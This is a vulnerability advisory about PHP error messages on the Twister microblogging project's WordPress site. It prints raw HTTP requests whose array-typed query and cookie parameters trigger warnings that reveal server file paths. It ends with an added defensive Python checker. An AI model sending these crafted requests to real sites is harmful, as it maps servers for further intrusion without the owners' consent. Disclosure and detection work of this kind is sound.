========================================================================
TWISTER Peer-To-Peer microblogging
Multiple Application Error Messages (disclosing sensitive information)
========================================================================

TIME-LINE VULNERABILITY

Multiple advisories, but no response. Not fixed.

-----------------
Alerts summary
-----------------

Application error message
**********************

/
    author
    cat
    comment_author_email_46104838c3366e1644fd983230bdf8c5
    comment_author_url_46104838c3366e1644fd983230bdf8c5
    feed
    m
    s
    wordpress_46104838c3366e1644fd983230bdf8c5
    wordpress_logged_in_46104838c3366e1644fd983230bdf8c5
/wp-comments-post.php
    author
    comment
    email
    url
/wp-login.php
    comment_author_email_46104838c3366e1644fd983230bdf8c5
    comment_author_url_46104838c3366e1644fd983230bdf8c5
    redirect_to
    user_email
    user_login
    wordpress_46104838c3366e1644fd983230bdf8c5
    wordpress_logged_in_46104838c3366e1644fd983230bdf8c5

I. VULNERABILITY
-------------------------

#Title: TWISTER.NET Multiple Application Error Messages (disclosing sensitive information)
#Vendor: http://www.twister.net.co
#Author: Juan Carlos García (@secnight)
#Verified: Francisco Moraga (@BTShell)
#http://asap-sec.com

II. DESCRIPTION
-------------------------

Twister Peer-to-peer microblogging is a fully decentralized P2P microblogging platform that leverages the free software implementations of the Bitcoin and BitTorrent protocols.

III. PROOF OF CONCEPT
-------------------------

--Attack details---

Application error message
-------------------------

Vulnerability description
*************************

This page contains an error/warning message that may disclose sensitive information. The message can also contain the location of the file that produced the unhandled exception.

Affected items
---------------

/
/wp-comments-post.php
/wp-login.php

Cookie input comment_author_email_46104838c3366e1644fd983230bdf8c5 was set to sample%40email.tst
Error message found:
Warning: trim() expects parameter 1 to be string, array given in /home/content/68/11448068/html/wp-includes/plugin.php on line 199

URL encoded GET input author was set to 1
Error message found:
Warning: urldecode() expects parameter 1 to be string, array given in /home/content/68/11448068/html/wp-includes/query.php on line 2519

    GET /?author[$secnight]=1&feed=rss2 HTTP/1.1
    Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst; comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+
    X-Pingback: http://twister.net.co/xmlrpc.php
    Host: twister.net.co
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate

URL encoded GET input cat was set to 1
Error message found:
Warning: urldecode() expects parameter 1 to be string, array given in /home/content/68/11448068/html/wp-includes/query.php on line 1771

    GET /?cat[$secnight]=1 HTTP/1.1
    Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst; comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+
    Host: twister.net.co
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate

Cookie input comment_author_url_46104838c3366e1644fd983230bdf8c5 was set to http%3A%2F%2F1
Error message found:
Warning: strip_tags() expects parameter 1 to be string, array given in /home/content/68/11448068/html/wp-includes/formatting.php on line 3261

    GET / HTTP/1.1
    Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst; comment_author_url_46104838c3366e1644fd983230bdf8c5[]=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+
    Referer: http://twister.net.co:80/
    Host: twister.net.co
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate

URL encoded GET input feed was set to 1
Error message found:
Warning: strpos() expects parameter 1 to be string, array given in /home/content/68/11448068/html/wp-includes/class-wp.php on line 331

    GET /?author=1&feed[$secnight]=1 HTTP/1.1
    Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst; comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+
    Host: twister.net.co

Cookie input comment_author_email_46104838c3366e1644fd983230bdf8c5 was set to sample%40email.tst
Error message found:
Warning: trim() expects parameter 1 to be string, array given in /home/content/68/11448068/html/wp-includes/plugin.php on line 199

    GET /wp-login.php HTTP/1.1
    Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5[]=sample%40email.tst; comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+
    Referer: http://twister.net.co:80/
    Host: twister.net.co

Etc.

IV. BUSINESS IMPACT
-------------------------

The impact of this vulnerability: the error messages disclose sensitive information. This information can be used to launch further attacks.

V. SOLUTION
------------------------

Pentesting, Review and Write Secure Code.

VI. CREDITS
-------------------------

This vulnerability has been discovered by Juan Carlos García (@secnight)
Verified by Francisco Moraga (@BTShell)
ASAP-SEC Team Members
Security As Soon As Possible (@Asap_Sec)

VII. LEGAL NOTICES
-------------------------

The Author accepts no responsibility for any damage caused by the use or misuse of this information.
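
Added example (not part of the original advisory, and not the vendor's or the authors' code): the findings in section III share one pattern, an input written as name[...] reaching a PHP function that expects a string, with the resulting warning and server path rendered into the page. The check below flags both halves, so it can be run against captured traffic to confirm that errors are no longer displayed. The function names are hypothetical, and the sample response markup is constructed around a warning quoted above.

```python
import html
import re
from urllib.parse import parse_qsl, unquote

# PHP diagnostic as rendered into a page when errors are displayed:
#   "Warning: trim() expects ... in /path/to/file.php on line 199"
PHP_DIAG = re.compile(
    r"(?P<level>Warning|Notice|Deprecated|Fatal error|Parse error):\s+"
    r"(?P<msg>[^\n]*?) in (?P<file>[^\n]+?) on line (?P<line>\d+)"
)

def leaked_php_errors(body):
    """Return (level, file, line) for every PHP diagnostic visible in a response body."""
    # HTML-formatted errors wrap parts of the message in <b> tags; strip markup first.
    text = html.unescape(re.sub(r"<[^>]+>", "", body))
    return [(m["level"], m["file"], int(m["line"])) for m in PHP_DIAG.finditer(text)]

def array_typed_inputs(request_line, cookie_header=""):
    """Return query/cookie names written as name[...], which PHP parses into arrays."""
    target = request_line.split()[1]
    names = [k for k, _ in parse_qsl(target.partition("?")[2], keep_blank_values=True)]
    # Cookie names are percent-decoded here so an encoded %5B is caught as well.
    names += [unquote(c.split("=", 1)[0].strip())
              for c in cookie_header.split(";") if c.strip()]
    return [n for n in names if "[" in n]

def audit(request_line, cookie_header, body):
    """Pair the array-typed inputs of a request with the diagnostics it produced."""
    return {"array_inputs": array_typed_inputs(request_line, cookie_header),
            "leaks": leaked_php_errors(body)}

# Constructed sample: request line and warning text as quoted in the advisory,
# cookie header shortened, response markup invented for the demonstration.
SAMPLE_REQUEST = "GET /?author[$secnight]=1&feed=rss2 HTTP/1.1"
SAMPLE_COOKIE = ("wordpress_test_cookie=WP+Cookie+check; "
                 "comment_author_url_46104838c3366e1644fd983230bdf8c5[]=http%3A%2F%2F1")
SAMPLE_BODY = (
    "<br />\n<b>Warning</b>:  urldecode() expects parameter 1 to be string, array given in "
    "<b>/home/content/68/11448068/html/wp-includes/query.php</b> on line <b>2519</b><br />\n"
    "<html><body>feed</body></html>"
)

if __name__ == "__main__":
    print(audit(SAMPLE_REQUEST, SAMPLE_COOKIE, SAMPLE_BODY))
```

An empty "leaks" list for a request that still carries array-typed inputs means the warning is no longer shown to the client; it does not show that the input is type-checked on the server.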